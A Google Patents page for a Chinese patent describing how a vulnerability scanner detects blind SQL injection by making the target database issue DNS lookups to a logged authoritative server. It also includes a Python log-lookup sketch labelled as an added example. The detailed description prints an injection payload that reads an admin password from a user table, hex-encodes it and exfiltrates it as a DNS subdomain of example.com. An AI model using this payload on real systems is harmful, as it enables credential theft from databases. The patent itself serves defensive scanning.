CN109347805A - DNS-based echoless SQL injection detection method - Google Patents

Info

Publication number: CN109347805A
Application number: CN201811096610.0A
Authority: CN (China)
Legal status: Granted
Other languages: Chinese (zh)
Other versions: CN109347805B (en)
Inventors: 应臣伟, 范渊
Current Assignee: Hangzhou Dbappsecurity Technology Co Ltd
Original Assignee: Hangzhou Dbappsecurity Technology Co Ltd
Prior art keywords: dns server, dns, sql injection, request, authoritative
Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1433 Vulnerability analysis
    • H04L61/00 Network arrangements, protocols or services for addressing or naming
    • H04L61/45 Network directories; Name-to-address mapping
    • H04L61/4505 Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
    • H04L61/4511 Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/01 Protocols
    • H04L67/02 Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]

Abstract

The present invention relates to a DNS-based echoless SQL injection detection method. A SQL injection scanner sends an HTTP request carrying a detection payload to a target website; once the payload is executed, a DNS request directed at an authoritative DNS server is initiated. The authoritative DNS server resolves the request, returns a response to the target website, and records the resolution result in a log. When the SQL injection scanner sends a resolution-record query to the authoritative DNS server over HTTP, the log is queried, and whether the website has a SQL injection vulnerability is determined by whether a resolution record exists. The invention uses DNS resolution records in a specific encoding format to detect echoless SQL injection, which allows vulnerabilities to be detected quickly and accurately, reduces detection time, improves scanner detection efficiency, and prevents false negatives and false positives.

Description

DNS-based echoless SQL injection detection method
Technical field
The present invention relates to the technical field of security arrangements for protecting computers, their components, programs or data against unauthorized activity, and in particular to a DNS-based echoless SQL injection detection method that achieves fast and effective detection during echoless SQL injection testing and reduces the scanner's false-positive and false-negative rates for SQL injection vulnerabilities.
Background
SQL is a standard computer language for accessing and operating database systems; SQL statements are used to retrieve and update data in a database. SQL works together with database programs and is widely used in Microsoft Access, DB2, Informix, Microsoft SQL Server, Oracle, Sybase and other database systems.
However, because developers use SQL statements improperly, SQL injection vulnerabilities are widespread. A SQL injection vulnerability is a security flaw that occurs in the database layer of an application. In short, SQL instructions are injected into an input string; a poorly designed program omits the check, so the database server mistakes the injected instructions for normal SQL instructions and runs them, and the system is damaged or compromised as a result.
In the prior art, SQL injection detection is one of the routine detection modes. Classified by the type of detection payload, SQL injection vulnerability detection includes boolean-based blind injection, time-based blind injection, error-based SQL injection, union-based SQL injection and other types. Boolean-based blind injection, error-based SQL injection and union-based SQL injection are commonly used to detect SQL injection vulnerabilities that produce an echo, while time-based blind injection is commonly used to detect SQL injection vulnerabilities without echo.
Boolean-based blind injection, error-based SQL injection and union-based SQL injection send different detection payloads during detection, which produce different HTTP response packets; page analysis of these differing responses determines whether a vulnerability exists. For a SQL injection vulnerability without echo, however, requests with different payloads receive the same response, so page analysis concludes that no SQL vulnerability exists, and the vulnerability goes unreported (a false negative).
Time-based blind injection sends different detection payload requests during detection that cause the target website to delay its response. The length of the delay is determined by the payload request, and whether a SQL vulnerability exists is judged from the differing response times, so time-based blind injection can be used to detect SQL vulnerabilities without echo. In practice, however, uncontrollable factors such as network quality add unnecessary delay to HTTP packets in transit, so time-based blind injection easily produces a large number of false positives when used to detect echoless SQL injection vulnerabilities.
Summary of the invention
To solve the problems in the prior art, the present invention provides an optimized DNS-based echoless SQL injection detection method.
The technical solution adopted by the invention is a DNS-based echoless SQL injection detection method comprising the following steps:
Step 1: the SQL injection scanner sends an HTTP request carrying a detection payload to the target website;
Step 2: the detection payload reaches the database server through the target website; the detection code in the payload is executed by the database, which initiates a DNS request directed at the authoritative DNS server;
Step 3: the authoritative DNS server resolves the DNS request, returns a response to the target website, and records the resolution result in a log;
Step 4: determine whether the SQL injection scanner has sent, via an HTTP request, a resolution-result query to the authoritative DNS server; if so, proceed to the next step; otherwise, return to step 1;
Step 5: the authoritative DNS server responds to the scanner's query and searches the log; if a resolution record exists, the website has a SQL injection vulnerability, otherwise it does not; the SQL injection detection result is returned.
Preferably, in step 2, the DNS request contains the special string that the SQL injection scanner uses to detect SQL vulnerabilities.
Preferably, in step 3, resolution by the authoritative DNS server of the DNS request directed at it comprises the following steps:
Step 3.1: the DNS request reaches the default DNS server;
Step 3.2: the default DNS server cannot resolve it and sends a query to the parent DNS server of the default DNS server;
Step 3.3: the parent DNS server resolves the authoritative DNS server address from the DNS request;
Step 3.4: the parent DNS server returns the authoritative DNS server address to the default DNS server;
Step 3.5: the default DNS server then sends a DNS query to the authoritative DNS server at that address;
Step 3.6: the authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing resolution of the DNS request.
The present invention provides an optimized DNS-based echoless SQL injection detection method. The SQL injection scanner sends an HTTP request carrying a detection payload to the target website; once the payload is executed, a DNS request directed at the authoritative DNS server is initiated. The authoritative DNS server resolves it, returns a response to the target website, and records the resolution result in a log. When the SQL injection scanner sends a resolution-record query to the authoritative DNS server over HTTP, the log is queried, and whether the website has a SQL injection vulnerability is determined by whether a resolution record exists. The invention uses DNS resolution records in a specific encoding format to detect echoless SQL injection. For echoless SQL injection detection, this solves the false-negative problem of boolean-based blind injection, error-based SQL injection and union-based SQL injection, and the false-positive problem of time-based blind injection. It allows vulnerabilities to be detected quickly and accurately, reduces detection time, improves scanner detection efficiency, and prevents false negatives and false positives.
Brief description of the drawings
Fig. 1 is a flow chart of the invention.
Detailed description
The present invention is described in further detail below with reference to an embodiment, but the scope of protection of the invention is not limited to it.
The present invention relates to a DNS-based echoless SQL injection detection method. DNS is an Internet service: a distributed database that maps domain names and IP addresses to each other and makes the Internet easier to access. DNS resolution yields the mapping between a domain name and an IP address and is performed by DNS servers.
Take as an example a target website under test that has a SQL injection vulnerability, with the domain name example.com resolved by the authoritative DNS. The method comprises the following steps.
Step 1: the SQL injection scanner sends an HTTP request carrying a detection payload to the target website.
In the present invention, an example of the HTTP request is:
http://example.com/sqli.php?id=1 union select 1,2,load_file(CONCAT('dns_sqli_',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.example.com\abc')).
Step 2: the detection payload reaches the database server through the target website; the detection code in the payload is executed by the database, which initiates a DNS request directed at the authoritative DNS server.
In step 2, the DNS request contains the special string that the SQL injection scanner uses to detect SQL vulnerabilities.
In the present invention, the DNS request directed at the authoritative DNS server is, for example, dns_sqli_password.example.com; the special string is, for example, dns_sqli_password.
Step 3: the authoritative DNS server resolves the DNS request, returns a response to the target website, and records the resolution result in a log.
In step 3, resolution by the authoritative DNS server of the DNS request directed at it comprises the following steps:
Step 3.1: the DNS request reaches the default DNS server;
Step 3.2: the default DNS server cannot resolve it and sends a query to the parent DNS server of the default DNS server;
Step 3.3: the parent DNS server resolves the authoritative DNS server address from the DNS request;
Step 3.4: the parent DNS server returns the authoritative DNS server address to the default DNS server;
Step 3.5: the default DNS server then sends a DNS query to the authoritative DNS server at that address;
Step 3.6: the authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing resolution of the DNS request.
In the present invention, let the DNS request be test.example.com. Because the parent DNS server is not the resolution server for example.com, it cannot resolve test.example.com itself, but it can determine that test.example.com is a subdomain of example.com, and it can resolve the address of the authoritative DNS server for example.com. The parent DNS server therefore returns the authoritative DNS server address to the default DNS server, the default DNS server sends a new DNS query for test.example.com to the authoritative DNS server, and the authoritative DNS server resolves the DNS request and returns the correct IP address of test.example.com to the default DNS server.
Step 4: determine whether the SQL injection scanner has sent, via an HTTP request, a resolution-result query to the authoritative DNS server; if so, proceed to the next step; otherwise, return to step 1.
In the present invention, the query is, for example: ask the authoritative DNS server whether a request containing the string "dns_sqli_" exists.
Step 5: the authoritative DNS server responds to the scanner's query and searches the log; if a resolution record exists, the website has a SQL injection vulnerability, otherwise it does not; the SQL injection detection result is returned.
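A sketch of the log lookup in steps 4 and 5, added here as an example and not code from the patent or its assignee: it searches the authoritative server's query records for the "dns_sqli_" marker under example.com and returns the detection result. The log layout, the sample lines and all function names are assumptions constructed for this example.

```python
ZONE = "example.com"   # zone the authoritative server answers for (page's example)
MARKER = "dns_sqli_"   # special string the page's log query searches for

# Constructed sample log, one query per line: "timestamp client qname qtype".
# This layout is an assumption for the example, not a real server's format.
SAMPLE_LOG = """\
2018-09-19T10:00:01Z 203.0.113.10 www.example.com. A
2018-09-19T10:00:02Z 203.0.113.10 DnS_SqLi_PassWord.ExAmPlE.CoM. A
2018-09-19T10:00:03Z 198.51.100.7 dns_sqli_password.example.org. A
2018-09-19T10:00:04Z 198.51.100.7 notdns_sqli_x.example.com. A
truncated-line-without-fields
2018-09-19T10:00:05Z 203.0.113.11 dns_sqli_password.example.com. A
"""


def parse_line(line):
    """Return one query record, or None for a line that does not parse."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qname, qtype = parts
    # DNS names compare case-insensitively and may carry a trailing root dot.
    # Resolvers that randomise letter case in queries would defeat an exact
    # string match, so names are normalised before comparison.
    return {"time": ts, "client": client,
            "qname": qname.rstrip(".").lower(), "qtype": qtype}


def marker_hits(log_text, zone=ZONE, marker=MARKER):
    """Collect distinct in-zone query names with a label starting with marker.

    Anchoring the marker to the start of a label is a stricter choice than the
    page's "contains" check, made here to avoid accidental substring matches.
    """
    suffix = "." + zone.lower()
    marker = marker.lower()
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["qname"].endswith(suffix):
            continue  # malformed line, or a name outside our zone
        labels = rec["qname"][: -len(suffix)].split(".")
        if not any(label.startswith(marker) for label in labels):
            continue
        # Resolvers retry and several resolvers may ask: fold repeats into one
        # record. The client seen here is the recursive (default) DNS server
        # of step 3.5, not the database host itself.
        hit = hits.setdefault(rec["qname"], {
            "qname": rec["qname"], "first_seen": rec["time"],
            "clients": [], "count": 0})
        hit["count"] += 1
        if rec["client"] not in hit["clients"]:
            hit["clients"].append(rec["client"])
    return list(hits.values())


def detection_result(log_text, zone=ZONE, marker=MARKER):
    """Step 5: a matching resolution record means the site is vulnerable."""
    records = marker_hits(log_text, zone, marker)
    return {"vulnerable": bool(records), "records": records}


if __name__ == "__main__":
    print(detection_result(SAMPLE_LOG))
```

Because the verdict depends only on whether a record exists, network latency does not affect it, which is the property the method relies on to avoid the false positives of time-based detection.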
In the present invention, the SQL injection scanner sends an HTTP request carrying a detection payload to the target website; once the payload is executed, a DNS request directed at the authoritative DNS server is initiated. The authoritative DNS server resolves it, returns a response to the target website, and records the resolution result in a log. When the SQL injection scanner sends a resolution-record query to the authoritative DNS server over HTTP, the log is queried, and whether the website has a SQL injection vulnerability is determined by whether a resolution record exists. The invention uses DNS resolution records in a specific encoding format to detect echoless SQL injection. For echoless SQL injection detection, this solves the false-negative problem of boolean-based blind injection, error-based SQL injection and union-based SQL injection, and the false-positive problem of time-based blind injection. It allows vulnerabilities to be detected quickly and accurately, reduces detection time, improves scanner detection efficiency, and prevents false negatives and false positives.

Claims (3)

1. A DNS-based echoless SQL injection detection method, characterized in that the method comprises the following steps:
Step 1: the SQL injection scanner sends an HTTP request carrying a detection payload to the target website;
Step 2: the detection payload reaches the database server through the target website; the detection code in the payload is executed by the database, which initiates a DNS request directed at the authoritative DNS server;
Step 3: the authoritative DNS server resolves the DNS request, returns a response to the target website, and records the resolution result in a log;
Step 4: determine whether the SQL injection scanner has sent, via an HTTP request, a resolution-result query to the authoritative DNS server; if so, proceed to the next step; otherwise, return to step 1;
Step 5: the authoritative DNS server responds to the scanner's query and searches the log; if a resolution record exists, the website has a SQL injection vulnerability, otherwise it does not; the SQL injection detection result is returned.
2. The DNS-based echoless SQL injection detection method according to claim 1, characterized in that, in step 2, the DNS request contains the special string that the SQL injection scanner uses to detect SQL vulnerabilities.
3. The DNS-based echoless SQL injection detection method according to claim 1, characterized in that, in step 3, resolution by the authoritative DNS server of the DNS request directed at it comprises the following steps:
Step 3.1: the DNS request reaches the default DNS server;
Step 3.2: the default DNS server cannot resolve it and sends a query to the parent DNS server of the default DNS server;
Step 3.3: the parent DNS server resolves the authoritative DNS server address from the DNS request;
Step 3.4: the parent DNS server returns the authoritative DNS server address to the default DNS server;
Step 3.5: the default DNS server then sends a DNS query to the authoritative DNS server at that address;
Step 3.6: the authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing resolution of the DNS request.
CN201811096610.0A 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method Active CN109347805B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811096610.0A CN109347805B (en) 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method

Publications (2)

Publication Number Publication Date
CN109347805A 2019-02-15
CN109347805B 2021-06-15

Family

ID=65305552

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201811096610.0A Active CN109347805B (en) 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method

Country Status (1)

Country Link
CN (1) CN109347805B (en)

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant